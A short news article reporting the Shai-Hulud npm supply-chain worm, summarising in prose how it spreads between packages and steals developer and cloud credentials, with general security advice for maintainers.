Largest and most perilous npm supply-chain breach labeled as 'Shai-Hulud malware campaign' targets hundreds of JavaScript packages, potentially posing a significant threat
In a groundbreaking revelation, Koi Security has announced the discovery of the largest and most dangerous npm supply-chain compromise in history - the Shai-Hulud malware campaign. This malicious activity has affected hundreds of npm packages across multiple maintainers, including popular libraries such as @ctrl/tinycolor and packages maintained by CrowdStrike.
The Shai-Hulud malware, named after a colossal sandworm from the Dune universe, is a worm that autonomously spreads from package to package. It infiltrates these packages by injecting a large, obfuscated script, often disguised as a harmless update. Once inside, the injected script performs credential harvesting and persistence operations.
One of the most concerning aspects of this campaign is its focus on endpoint secret theft and backdoors. The malware writes a hidden GitHub Actions workflow file that exfiltrates secrets during CI/CD runs. It runs TruffleHog, a tool designed to scan local filesystems and repositories for secrets, including npm tokens, GitHub credentials, and cloud access keys for AWS, GCP, and Azure.
StepSecurity has published indicators of compromise and a technical breakdown of the malware's spread and activities. They warn that the Shai-Hulud malware campaign, compared to previous compromises, is one of the most dangerous due to its focus on endpoint secret theft and backdoors.
The Shai-Hulud malware campaign has been active since September 2025, and it's crucial for developers and maintainers to be vigilant and take necessary precautions to protect their packages and projects. This includes regularly auditing the code for any suspicious or unknown additions, keeping dependencies up-to-date, and implementing strong security practices during the development process.
For the latest news and in-depth reviews on technology and cybersecurity, subscribe to the Tom's Hardware newsletter. Stay informed and stay secure.
Read also:
- InformationWarfare in the Modern Era: Enhancing an Information Strategy for today's Battlefield and Botnet Threats
- U.S. intelligence leader alleges UK succumbed to pressure over Apple data access request
- Politician's Rivalry Slips into Online Traps Made for Stealing Information via Social Media Phishes
- Top 46 Significant Tech Firms Based in Toronto
